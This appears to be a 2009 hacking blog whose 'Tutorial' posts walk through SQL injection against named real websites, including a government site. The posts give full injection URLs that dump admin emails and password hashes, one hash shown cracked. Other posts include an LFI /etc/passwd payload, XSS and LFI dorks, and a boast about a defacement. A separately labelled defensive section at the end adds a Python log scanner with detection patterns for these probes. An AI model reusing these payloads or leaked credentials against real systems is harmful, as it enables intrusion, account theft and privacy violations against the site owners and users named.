Bryan_ae1

Live This Life As It Is

Archive for the ‘Tutorial’ Category

http://langkawi-rstholidays.com

Posted by bryanae1 on November 17, 2009

this morning I dropped by js and someone had posted a shell on some unlucky website… so I tried playing with it… hihihihihi…

got a souvenir :D

here's the handiwork :D

http://langkawi-rstholidays.com/index2.php

wkwkwkwkw… time to run :D

Posted in Tutorial | Leave a Comment »

LFI and XSS

Posted by bryanae1 on November 1, 2009

bug : http://www.milw0rm.com/exploits/9370

http://www.zoomed.com

inurl:”/login.php?err=”

http://www.y3sfinancialservices.com
http://www.milw0rm.com/exploits/9625
http://site/path/index.php?s=../../../../../../../etc/passwd%00

Posted in Tutorial | Leave a Comment »

inject kfm.depsos.go.id

Posted by bryanae1 on August 28, 2009

check for an error:

http://kfm.depsos.go.id/mod.php?mod=publisher&op=viewarticle&artid=10′

1. Checking the number of table fields

found it here:

http://kfm.depsos.go.id/mod.php?mod=publisher&op=viewarticle&artid=10+order+by+11–

because at:

http://kfm.depsos.go.id/mod.php?mod=publisher&op=viewarticle&artid=10+order+by+12–

an error shows up.

2. Displaying the field numbers

found it here:

http://kfm.depsos.go.id/mod.php?mod=publisher&op=viewarticle&artid=-10+union+all+select+1,2,3,4,5,6,7,8,9,10,11–

3. Listing the table names

http://kfm.depsos.go.id/mod.php?mod=publisher&op=viewarticle&artid=-10+union+all+select+1,2,3,4,5,6,7,8,group_concat(table_name),10,11+from+information_schema.tables+where+table_schema=database()–

4. Listing the field names of the table that stores the users' UserID and Password

http://kfm.depsos.go.id/mod.php?mod=publisher&op=viewarticle&artid=-10+union+all+select+1,2,3,4,5,6,7,8,group_concat(column_name),10,11+from+information_schema.columns+where+table_name=0×617574686f7273

here I took authors = 617574686f7273

5. Dumping the records from the member table

http://kfm.depsos.go.id/mod.php?mod=publisher&op=viewarticle&artid=-10+union+all+select+1,2,3,4,5,6,7,8,group_concat(aid,0×3a,name,0×3a,url,0×3a,email,0×3a,pwd,0×3a,counter),10,11+from+authors–

done :

By adminkfm:Admin Database:www.depsos.go.id:ujangth@depsos.go.id:cb688d4e30b2488b88e963f933e6f20c:4

cb688d4e30b2488b88e963f933e6f20c = tiarariska

wow, looks like it's the name of the admin's girlfriend.. hihihihihih

hopefully the admin fixes it soon :D

Posted in Tutorial | 5 Comments »

XSS again

Posted by bryanae1 on June 11, 2009

after being knocked out for 2 days because of something, finally back online :D

was browsing milw0rm and found an XSS bug: milw0rm

tried searching and, hey, got 3 sites :D :

1. www.synergiepark-stuttgart.de

2. www.skypethailand.com

3. www.lacare.org

down.

thanks : milw0rm.com

all my friends&mainhack Brotherhood

special to My mimi always miss&love u  :*

Posted in Tutorial | Leave a Comment »

XSS : inurl:/?op=mi&id=

Posted by bryanae1 on June 6, 2009

Posted in Tutorial | Leave a Comment »

XSS Again

Posted by bryanae1 on June 5, 2009

Posted in Tutorial | 2 Comments »

XSS Dork inurl:/news.php?id=

Posted by bryanae1 on June 1, 2009

Posted in Tutorial | 1 Comment »

Sql Injection on http://ccs.my

Posted by bryanae1 on May 31, 2009

here -> http://ccs.my/news.php?id=1561

test error :

http://ccs.my/news.php?id=1561′

yup, there's an error, let's test it :D

1. Checking the number of table fields

found it here:

http://ccs.my/news.php?id=1561+order+by+6–

yes, because at number 7 it already comes back false :p

2. Displaying the field numbers

found it here:

http://ccs.my/news.php?id=null+union+all+select+1,2,3,4,5,6–

3. Displaying the MySQL version, database name and user name

http://ccs.my/news.php?id=-1561+union+all+select+1,2,concat_ws(0×2B,version(),database(),user()),4,5,6++from+information_schema.tables+where+table_schema=database()–

4. Listing the table names

http://ccs.my/news.php?id=-1561+union+all+select+1,2,group_concat(table_name),4,5,6++from+information_schema.tables+where+table_schema=database()–

5. Listing the field names of the table that stores the users' UserID and Password

http://ccs.my/news.php?id=-1561+union+all+select+1,2,group_concat(column_name),4,5,6+from+information_schema.columns+where+table_name=0×6d656d626572

here I took it from member :D

6. Dumping the records from the member table

http://ccs.my/news.php?id=-1561+union+all+select+1,2,group_concat(username,0×3a,password,0×3a,email,0×3a,member),4,5,6+from+member+–

Bingo….


thanks to :

Nocki aka Mad’on, friends at arabhack@dal.nyet, Mainhack Brotherhood & friends at indohackerlink@dal.nyet & all my friends

special to mami :* love u mam

Posted in Tutorial | Leave a Comment »

XSS and LFI

Posted by bryanae1 on May 30, 2009

Can't sleep at this hour, head's pounding, just messing around

found the dork inurl:?root=

an old dork, though

found sites vulnerable to XSS:

see here

also here

hit it again

swipe it again

As for LFI

Dork : inurl:”index.php?include_file=”

Vulnerable to LFI:

1
2
3
4

Posted in Tutorial | Leave a Comment »

Sql Injection website http://www.kpu-kotabogor.com

Posted by bryanae1 on May 30, 2009

1. Test error

compare:

http://www.kpu-kotabogor.com/mod.php?mod=publisher&op=viewarticle&artid=13

with a ' appended at the end

http://www.kpu-kotabogor.com/mod.php?mod=publisher&op=viewarticle&artid=13′

yes, there's an error here and we can inject it :D

2. Checking the number of table fields

http://www.kpu-kotabogor.com/mod.php?mod=publisher&op=viewarticle&artid=13+order+by+11–

3. Displaying the field numbers

http://www.kpu-kotabogor.com/mod.php?mod=publisher&op=viewarticle&artid=null+union+all+select+1,2,3,4,5,6,7,8,9,10,11–

4. Displaying the MySQL version, database name and user name

http://www.kpu-kotabogor.com/mod.php?mod=publisher&op=viewarticle&artid=-13+union+all+select+1,2,3,concat_ws(0×2B,version(),database(),user()),5,6,group_concat(table_name),8,9,10,11+from+information_schema.tables+where+table_schema=database()–

5. Listing the table names

http://www.kpu-kotabogor.com/mod.php?mod=publisher&op=viewarticle&artid=-13+union+all+select+1,2,3,concat_ws(0×2B,version(),database(),user()),5,6,group_concat(table_name),8,9,10,11+from+information_schema.tables+where+table_schema=database()–

6. Listing the field names of the table that stores the users' UserID and Password

http://www.kpu-kotabogor.com/mod.php?mod=publisher&op=viewarticle&artid=-13+union+all+select+1,2,3,4,5,6,group_concat(column_name),8,9,10,11+from+information_schema.columns+where+table_name=0×617574686f7273

here I took the table name authors

7. Dumping the records from the authors table

http://www.kpu-kotabogor.com/mod.php?mod=publisher&op=viewarticle&artid=-13+union+all+select+1,2,3,4,5,6,group_concat(aid,0×3a,name,0×3a,url,0×3a,email,0×3a,pwd,0×3a,counter),8,9,10,11+from+authors%20–

Bingo :

admin:Administrator:http://www.kpu-kotabogor.com:admin@kpu-kotabogor.com:204f9a8c36fe3eeffde4ed2a7b03f16b:99

Go for it, bro.. but too bad the admin page can't be accessed.. wkwkwkwkw

Thanks To All My Friend&Mainhack Brotherhood

Special To ya2nk Miss&Love U

Posted in Tutorial | 1 Comment »
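
A defender's view of the request sequences in the SQL injection posts above, as an added example that is not code from the original blog: a Python scan of web access logs for the probes each step sends (trailing quote, `order by N`, `union select`, `information_schema`, hex literal, `group_concat`), grouped per client. The log lines, client addresses and the `/news.php` and `/search.php` endpoints are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote_plus

# One signature per step of the walkthroughs, matched on the decoded query string.
SIGNATURES = {
    "quote_probe": re.compile(r"=\s*-?\d+'"),                    # numeric id followed by '
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),   # column counting
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{4,}\b", re.I),      # hex-encoded table name
    "group_concat": re.compile(r"\bgroup_concat\s*\(", re.I),
}
# Combined Log Format: client address first, request line in the first quoted field.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(query):
    """Return the sorted signature names matching one raw (still encoded) query string."""
    decoded = unquote_plus(query)  # '+' becomes a space, %27 becomes '
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(decoded))

def alerts(lines, min_signatures=2):
    """Collect hits per client; report clients with at least min_signatures distinct ones."""
    seen = defaultdict(set)
    for line in lines:
        m = LOG_LINE.match(line)
        if m:
            seen[m.group(1)].update(classify(urlsplit(m.group(2)).query))
    return {ip: sorted(tags) for ip, tags in seen.items() if len(tags) >= min_signatures}

# Constructed sample log: documentation addresses, hypothetical endpoints.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /news.php?id=15%27 HTTP/1.1" 200 512
203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /news.php?id=15+order+by+7-- HTTP/1.1" 200 498
203.0.113.7 - - [01/Jan/2024:10:00:20 +0000] "GET /news.php?id=-15+union+all+select+1,2,group_concat(table_name),4,5,6+from+information_schema.tables+where+table_schema=database()-- HTTP/1.1" 200 2048
203.0.113.7 - - [01/Jan/2024:10:00:31 +0000] "GET /news.php?id=-15+union+all+select+1,2,group_concat(column_name),4,5,6+from+information_schema.columns+where+table_name=0x6d656d626572 HTTP/1.1" 200 1024
198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /news.php?id=15 HTTP/1.1" 200 3301
198.51.100.4 - - [01/Jan/2024:10:01:05 +0000] "GET /search.php?q=student+union+select+committee HTTP/1.1" 200 900
""".splitlines()

if __name__ == "__main__":
    for ip, tags in alerts(SAMPLE_LOG).items():
        print(ip, "->", ", ".join(tags))
```

Detection only shows that someone is probing; the flaw itself is closed by casting the numeric id parameter to an integer or binding it in a prepared statement, so the quote and `union` text never reach the SQL parser.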